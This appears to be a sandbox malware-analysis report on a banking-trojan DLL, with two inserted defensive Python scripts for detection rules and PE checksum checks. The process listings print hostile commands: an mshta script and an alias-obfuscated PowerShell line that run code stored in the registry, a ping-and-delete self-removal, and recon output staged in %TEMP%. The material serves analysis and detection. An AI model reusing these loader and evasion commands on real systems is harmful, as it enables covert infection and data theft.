                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D190C GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D6D0A NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D84C1 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628BE80 NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06280782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062774AE NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06286DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06282331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06285312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627710A GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06287950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062736BB NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062764C4 memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06285220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06283829 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0053583C NtCreateSection,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005240C0 NtReadVirtualMemory,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0054A148 NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0052B11C RtlAllocateHeap,NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005341D8 NtMapViewOfSection,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0052AA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005404CC NtAllocateVirtualMemory,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00526D24 NtWriteVirtualMemory,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005265E4 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00529660 NtSetContextThread,NtUnmapViewOfSection,NtClose,
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0055F002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572395A148 NtQueryInformationProcess,
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_00000157239365E4 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572396F002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                      Source: 2oCOO5LbPu.dll | Binary or memory string: OriginalFilenamemyfile.exe$ vs 2oCOO5LbPu.dll
                      Source: 2oCOO5LbPu.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220504
                      Source: 2E09.bin.27.dr | Binary string: Boot Device: \Device\HarddiskVolume2
                      Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winDLL@61/27@11/4
                      Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: 2oCOO5LbPu.dll | ReversingLabs: Detection: 50%
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll"
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
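The process-creation rows above are the observable side of this sample's behaviour: mshta.exe spawning an alias-obfuscated PowerShell one-liner that reads a value from HKCU\Software\AppDataLow\... and executes it, PowerShell invoking csc.exe (an Add-Type style on-the-fly compile), and explorer.exe running the ping-then-del self-deletion, the myip.opendns.com lookup and systeminfo redirected into %TEMP%. The script below is an added example and not part of the Joe Sandbox report: it runs a handful of detection rules over process-creation records built from the command lines listed above plus two constructed benign records, and undoes the new-alias obfuscation to show which cmdlets actually ran. The record fields (parent, image, cmdline) are assumed to match what Sysmon Event ID 1 or comparable EDR telemetry provides.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (fields as in Sysmon Event ID 1 / EDR telemetry)."""
    parent: str
    image: str
    cmdline: str


# Constructed sample records. The first five command lines are the ones listed in
# the report above; the last two are made up to show the rules stay quiet on
# ordinary ping / systeminfo use.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe new-alias -name jasvusrvks -value gp; "
              "new-alias -name ssmthn -value iex; "
              "ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "
              "\"HKCU:Software\\AppDataLow\\Software\\Microsoft\\"
              "54E80703-A337-A6B8-CDC8-873A517CAB0E\").UrlsReturn))"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"'),
    # benign, constructed: a user pinging a host and saving an inventory to Documents
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /C ping 10.0.0.1 -n 4"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd /C "systeminfo > C:\Users\user\Documents\inventory.txt"'),
]

ALIAS_DEF = re.compile(r"new-alias\s+-name\s+(\S+)\s+-value\s+(\S+)", re.I)


def resolve_aliases(ps: str) -> str:
    """Undo inline 'new-alias' obfuscation: drop the alias definitions and
    substitute every alias with its target so the real cmdlets (iex, gp) show.
    Statement separators are flattened to spaces, which is fine for display."""
    aliases = {name: target.rstrip(";") for name, target in ALIAS_DEF.findall(ps)}
    body = ALIAS_DEF.sub("", ps)
    for name, target in aliases.items():
        body = re.sub(r"\b%s\b" % re.escape(name), target, body, flags=re.I)
    body = re.sub(r"\s*;\s*", " ", body)
    return re.sub(r"\s+", " ", body).strip()


def _is(image: str, name: str) -> bool:
    return image.lower().endswith("\\" + name)


RULES = {
    # cmd /C ping <host> -n N && del <file>: sleep via ping, then delete the dropper
    "self_delete_via_ping": lambda e: _is(e.image, "cmd.exe") and bool(
        re.search(r"\bping\b.*\s-n\s+\d+.*&&\s*del\b", e.cmdline, re.I)),
    # public IP discovery through OpenDNS's myip.opendns.com trick
    "external_ip_lookup": lambda e: bool(
        re.search(r"\bnslookup\b.*\bmyip\.opendns\.com\b", e.cmdline, re.I)),
    # host recon written to a file under %TEMP% (staged for exfiltration)
    "recon_output_to_temp": lambda e: _is(e.image, "cmd.exe") and bool(
        re.search(r"\bsysteminfo(\.exe)?\b.*>\s*\S*\\AppData\\Local\\Temp\\",
                  e.cmdline, re.I)),
    # iex of data pulled from HKCU\Software\AppDataLow, hidden behind new-alias
    "powershell_alias_iex_from_registry": lambda e: _is(e.image, "powershell.exe")
        and "appdatalow" in e.cmdline.lower()
        and bool(re.search(r"\b(iex|invoke-expression)\b",
                           resolve_aliases(e.cmdline), re.I)),
    # PowerShell compiling C# on the fly (Add-Type) -> csc.exe child; weak on its own
    "powershell_spawns_csc": lambda e: _is(e.parent, "powershell.exe")
        and _is(e.image, "csc.exe"),
}


def evaluate(events):
    """Return {rule_name: [matching command lines]} for the given records."""
    hits = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev.cmdline)
    return hits


if __name__ == "__main__":
    for name, cmds in evaluate(SAMPLE_EVENTS).items():
        print(f"[{name}]")
        for c in cmds:
            print("   ", c)
    print("deobfuscated:", resolve_aliases(SAMPLE_EVENTS[0].cmdline))
```

The csc.exe rule is deliberately listed last: PowerShell compiling C# is common in administrative scripts, so on its own it is only a weak signal and should be correlated with the mshta.exe parent and the AppDataLow registry read seen in the same tree. The alias resolver only handles the inline `new-alias -name X -value Y` form used here; aliases created with `Set-Alias` or via splatting would need additional patterns.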
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eix4r5e5.krv.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll (6 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_036D68BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{60D7F404-3F23-92D7-C994-E3E60D08C77A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{5064A2E5-6FEB-0222-7984-1356BDF8F7EA}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{CC5B86B9-BBE4-DE12-A5C0-1FF2A9F4C346}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{8CCBC699-7B11-9ED8-6580-DFB269B48306}
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: 2oCOO5LbPu.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdb8 source: powershell.exe, 00000014.00000002.566709177.0000012312B1D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb source: 2oCOO5LbPu.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdbXP source: powershell.exe, 00000014.00000002.568732109.0000012312B68000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_036D7EA0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_036D828B push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_06273495 push ecx; mov dword ptr [esp], 00000002h
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_06293D9F push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_06281040 push es; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_062938A0 push ecx; ret
Source: C:\Windows\System32\control.exe Code function: 24_2_00544492 push ss; ret
Source: C:\Windows\System32\rundll32.exe Code function: 37_2_000001572393793F pushfd ; retf
Source: C:\Windows\System32\rundll32.exe Code function: 37_2_0000015723954492 push ss; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_062786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline (observed twice)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline (observed twice)
Source: 2oCOO5LbPu.dll Static PE information: section name: .erloc
Source: ykprd3xj.dll.22.dr Static PE information: real checksum: 0x0 should be: 0x2507
Source: 2oCOO5LbPu.dll Static PE information: real checksum: 0x79835 should be: 0x763dc
Source: dyznokx3.dll.25.dr Static PE information: real checksum: 0x0 should be: 0x14bd
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll
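The three "real checksum ... should be ..." rows compare the CheckSum field of the optional header with the value the loader would compute. A stored value of 0 only means the file was written without one, which is the case for the two DLLs csc.exe generated on the fly; a wrong non-zero value, as on the submitted sample itself, means the image was altered after it was linked (packing, patching, or an appended overlay). Windows enforces the field only for drivers and a few boot-time system images, so a mismatch never stops a user-mode DLL from loading; treat it as a triage signal, not a protection. The script below is an added example, not part of the report: it implements the PE CheckSum algorithm (sum of all 16-bit words with end-around carry, the CheckSum field itself skipped, plus the file length) and runs it on a constructed minimal PE32 header, so the same check can be reproduced on dropped files without third-party libraries.

```python
import struct

CHECKSUM_IN_OPTIONAL_HEADER = 0x40   # same offset in PE32 and PE32+ optional headers


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE CheckSum as the Windows loader computes it: add all 16-bit little-endian
    words with end-around carry, skipping the 4-byte CheckSum field, then add the
    file length. A trailing odd byte is added as-is."""
    total = 0
    length = len(data)
    for i in range(0, length - (length & 1), 2):
        if i == checksum_offset or i == checksum_offset + 2:
            continue                      # the field being computed is excluded
        total += data[i] | (data[i + 1] << 8)
        total = (total & 0xFFFF) + (total >> 16)
    if length & 1:
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + length


def checksum_field_offset(data: bytes) -> int:
    """Locate IMAGE_OPTIONAL_HEADER.CheckSum via e_lfanew; raises on non-PE input."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # 4-byte signature + 20-byte COFF header precede the optional header
    return e_lfanew + 4 + 20 + CHECKSUM_IN_OPTIONAL_HEADER


def check_pe(data: bytes):
    """Return (stored, expected), the pair the report prints as
    'real checksum: <stored> should be: <expected>'."""
    off = checksum_field_offset(data)
    stored = struct.unpack_from("<I", data, off)[0]
    return stored, pe_checksum(data, off)


def fix_checksum(data: bytes) -> bytes:
    """Return a copy with a correct CheckSum written into the header."""
    out = bytearray(data)
    off = checksum_field_offset(out)
    struct.pack_into("<I", out, off, pe_checksum(out, off))
    return bytes(out)


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 header (not a real file and not the sample above):
    DOS header, PE signature, COFF header and the start of an optional header,
    with CheckSum left at 0 like the csc.exe-generated DLLs in the report."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)          # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", buf, 0x44, 0x14C, 1)     # Machine = i386, 1 section
    struct.pack_into("<H", buf, 0x54, 0xE0)          # SizeOfOptionalHeader (PE32)
    struct.pack_into("<H", buf, 0x58, 0x10B)         # optional header magic PE32
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample_pe()
    stored, expected = check_pe(sample)
    print(f"real checksum: {stored:#x} should be: {expected:#x}")
    print("fixed copy verifies:", check_pe(fix_checksum(sample))[0] == expected)
```

Run `check_pe(open(path, "rb").read())` on a dropped file to get the same pair the report shows. Because the field is excluded from the sum, writing a correct value back does not change the expected result, which is what `fix_checksum` relies on; the flip side is that an attacker can just as easily repair the field after patching a binary, so a matching checksum proves nothing about integrity.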

Hooking and other Techniques for Hiding and Protection

Source: Yara match File source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
